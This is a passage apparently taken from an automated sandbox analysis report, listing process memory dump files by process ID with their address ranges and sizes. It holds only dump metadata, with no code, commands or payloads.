memory/924-224-0x0000000000690000-0x00000000006B0000-memory.dmpFilesize
128KB
-
memory/924-223-0x0000000000670000-0x0000000000690000-memory.dmpFilesize
128KB
-
memory/924-170-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-172-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-175-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-178-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-181-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-184-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-185-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-198-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-196-0x0000000000070000-0x0000000000090000-memory.dmpFilesize
128KB
-
memory/924-186-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-194-0x000000014030F3F8-mapping.dmp
-
memory/924-187-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/924-189-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/988-73-0x0000000000360000-0x000000000038E000-memory.dmpFilesize
184KB
-
memory/988-83-0x0000000004D54000-0x0000000004D55000-memory.dmpFilesize
4KB
-
memory/988-82-0x0000000004D52000-0x0000000004D53000-memory.dmpFilesize
4KB
-
memory/988-81-0x0000000004D51000-0x0000000004D52000-memory.dmpFilesize
4KB
-
memory/988-79-0x0000000001EC0000-0x0000000001ED9000-memory.dmpFilesize
100KB
-
memory/988-70-0x0000000000000000-mapping.dmp
-
memory/1008-91-0x0000000000000000-mapping.dmp
-
memory/1152-86-0x000000001B540000-0x000000001B75E000-memory.dmpFilesize
2.1MB
-
memory/1152-85-0x00000000000A0000-0x00000000002C2000-memory.dmpFilesize
2.1MB
-
memory/1152-99-0x000000001B2A6000-0x000000001B2A7000-memory.dmpFilesize
4KB
-
memory/1152-110-0x000000001B2A7000-0x000000001B2A8000-memory.dmpFilesize
4KB
-
memory/1152-94-0x000000001B2A2000-0x000000001B2A4000-memory.dmpFilesize
8KB
-
memory/1152-98-0x000000001B2A4000-0x000000001B2A6000-memory.dmpFilesize
8KB
-
memory/1168-173-0x0000000002890000-0x0000000002892000-memory.dmpFilesize
8KB
-
memory/1168-177-0x000000000289B000-0x00000000028BA000-memory.dmpFilesize
124KB
-
memory/1168-176-0x0000000002894000-0x0000000002897000-memory.dmpFilesize
12KB
-
memory/1168-174-0x0000000002892000-0x0000000002894000-memory.dmpFilesize
8KB
-
memory/1168-154-0x0000000000000000-mapping.dmp
-
memory/1168-162-0x000007FEECA90000-0x000007FEED5ED000-memory.dmpFilesize
11.4MB
-
memory/1288-233-0x0000000000060000-0x0000000000066000-memory.dmpFilesize
24KB
-
memory/1288-235-0x000000001AD22000-0x000000001AD24000-memory.dmpFilesize
8KB
-
memory/1288-234-0x00000000001D0000-0x00000000001D3000-memory.dmpFilesize
12KB
-
memory/1404-87-0x000000001B290000-0x000000001B47E000-memory.dmpFilesize
1.9MB
-
memory/1404-109-0x000000001ABD6000-0x000000001ABD7000-memory.dmpFilesize
4KB
-
memory/1404-96-0x000000001ABD2000-0x000000001ABD4000-memory.dmpFilesize
8KB
-
memory/1404-84-0x0000000000230000-0x0000000000422000-memory.dmpFilesize
1.9MB
-
memory/1404-111-0x000000001ABD7000-0x000000001ABD8000-memory.dmpFilesize
4KB
-
memory/1404-108-0x000000001ABD4000-0x000000001ABD6000-memory.dmpFilesize
8KB
-
memory/1408-147-0x0000000000000000-mapping.dmp
-
memory/1408-150-0x0000000000400000-0x0000000000E48000-memory.dmpFilesize
10.3MB
-
memory/1444-100-0x000007FEED4C0000-0x000007FEEE01D000-memory.dmpFilesize
11.4MB
-
memory/1444-105-0x0000000002754000-0x0000000002757000-memory.dmpFilesize
12KB
-
memory/1444-126-0x000000000275B000-0x000000000277A000-memory.dmpFilesize
124KB
-
memory/1444-117-0x000000001B860000-0x000000001BB5F000-memory.dmpFilesize
3.0MB
-
memory/1444-102-0x0000000002750000-0x0000000002752000-memory.dmpFilesize
8KB
-
memory/1444-92-0x0000000000000000-mapping.dmp
-
memory/1444-95-0x000007FEFB951000-0x000007FEFB953000-memory.dmpFilesize
8KB
-
memory/1444-104-0x0000000002752000-0x0000000002754000-memory.dmpFilesize
8KB
-
memory/1492-127-0x000000000228B000-0x00000000022AA000-memory.dmpFilesize
124KB
-
memory/1492-118-0x0000000000000000-mapping.dmp
-
memory/1492-124-0x0000000002282000-0x0000000002284000-memory.dmpFilesize
8KB
-
memory/1492-125-0x0000000002284000-0x0000000002287000-memory.dmpFilesize
12KB
-
memory/1492-123-0x0000000002280000-0x0000000002282000-memory.dmpFilesize
8KB
-
memory/1492-122-0x000007FEED4C0000-0x000007FEEE01D000-memory.dmpFilesize
11.4MB
-
memory/1576-207-0x0000000000000000-mapping.dmp
-
memory/1592-164-0x0000000000000000-mapping.dmp
-
memory/1604-220-0x000000000281B000-0x000000000283A000-memory.dmpFilesize
124KB
-
memory/1604-214-0x0000000000000000-mapping.dmp
-
memory/1604-217-0x000007FEF24A0000-0x000007FEF2FFD000-memory.dmpFilesize
11.4MB
-
memory/1604-218-0x000000001B7B0000-0x000000001BAAF000-memory.dmpFilesize
3.0MB
-
memory/1604-219-0x0000000002810000-0x0000000002812000-memory.dmpFilesize
8KB
-
memory/1604-221-0x0000000002812000-0x0000000002814000-memory.dmpFilesize
8KB
-
memory/1604-222-0x0000000002814000-0x0000000002817000-memory.dmpFilesize
12KB
-
memory/1636-116-0x0000000000000000-mapping.dmp
-
memory/1652-193-0x0000000000000000-mapping.dmp
-
memory/1656-128-0x0000000000000000-mapping.dmp
-
memory/1656-132-0x000007FEED4C0000-0x000007FEEE01D000-memory.dmpFilesize
11.4MB
-
memory/1656-135-0x00000000025C4000-0x00000000025C7000-memory.dmpFilesize
12KB
-
memory/1656-134-0x00000000025C2000-0x00000000025C4000-memory.dmpFilesize
8KB
-
memory/1656-133-0x00000000025C0000-0x00000000025C2000-memory.dmpFilesize
8KB
-
memory/1656-136-0x00000000025CB000-0x00000000025EA000-memory.dmpFilesize
124KB
-
memory/1668-90-0x0000000000000000-mapping.dmp
-
memory/1676-145-0x0000000000000000-mapping.dmp
-
memory/1684-202-0x0000000002117000-0x0000000002118000-memory.dmpFilesize
4KB
-
memory/1684-201-0x0000000002116000-0x0000000002117000-memory.dmpFilesize
4KB
-
memory/1684-200-0x0000000002114000-0x0000000002116000-memory.dmpFilesize
8KB
-
memory/1684-199-0x0000000002112000-0x0000000002114000-memory.dmpFilesize
8KB
-
memory/1732-225-0x00000000001D0000-0x00000000001D3000-memory.dmpFilesize
12KB
-
memory/1732-232-0x0000000002177000-0x0000000002178000-memory.dmpFilesize
4KB
-
memory/1732-231-0x0000000002176000-0x0000000002177000-memory.dmpFilesize
4KB
-
memory/1732-230-0x0000000002174000-0x0000000002176000-memory.dmpFilesize
8KB
-
memory/1732-228-0x0000000000060000-0x0000000000066000-memory.dmpFilesize
24KB
-
memory/1732-229-0x0000000002172000-0x0000000002174000-memory.dmpFilesize
8KB
-
memory/1748-113-0x0000000000000000-mapping.dmp
-
memory/1752-182-0x0000000002754000-0x0000000002757000-memory.dmpFilesize
12KB
-
memory/1752-188-0x000000001B760000-0x000000001BA5F000-memory.dmpFilesize
3.0MB
-
memory/1752-171-0x000007FEECA90000-0x000007FEED5ED000-memory.dmpFilesize
11.4MB
-
memory/1752-180-0x0000000002752000-0x0000000002754000-memory.dmpFilesize
8KB
-
memory/1752-179-0x0000000002750000-0x0000000002752000-memory.dmpFilesize
8KB
-
memory/1752-166-0x0000000000000000-mapping.dmp
-
memory/1752-195-0x000000000275B000-0x000000000277A000-memory.dmpFilesize
124KB
-
memory/1760-158-0x00000000023C7000-0x00000000023C8000-memory.dmpFilesize
4KB
-
memory/1760-155-0x00000000023C2000-0x00000000023C4000-memory.dmpFilesize
8KB
-
memory/1760-157-0x00000000023C6000-0x00000000023C7000-memory.dmpFilesize
4KB
-
memory/1760-156-0x00000000023C4000-0x00000000023C6000-memory.dmpFilesize
8KB
-
memory/1764-115-0x0000000000000000-mapping.dmp
-
memory/1792-139-0x0000000000000000-mapping.dmp
-
memory/1800-144-0x0000000000400000-0x0000000000EAE000-memory.dmpFilesize
10.7MB
-
memory/1800-141-0x0000000000000000-mapping.dmp
-
memory/1908-114-0x0000000000000000-mapping.dmp
-
memory/1944-68-0x0000000000401000-0x0000000000403000-memory.dmpFilesize
8KB
-
memory/1944-72-0x0000000000400000-0x0000000000EAE000-memory.dmpFilesize
10.7MB
-
memory/1944-64-0x0000000000000000-mapping.dmp
-
memory/1984-153-0x0000000000000000-mapping.dmp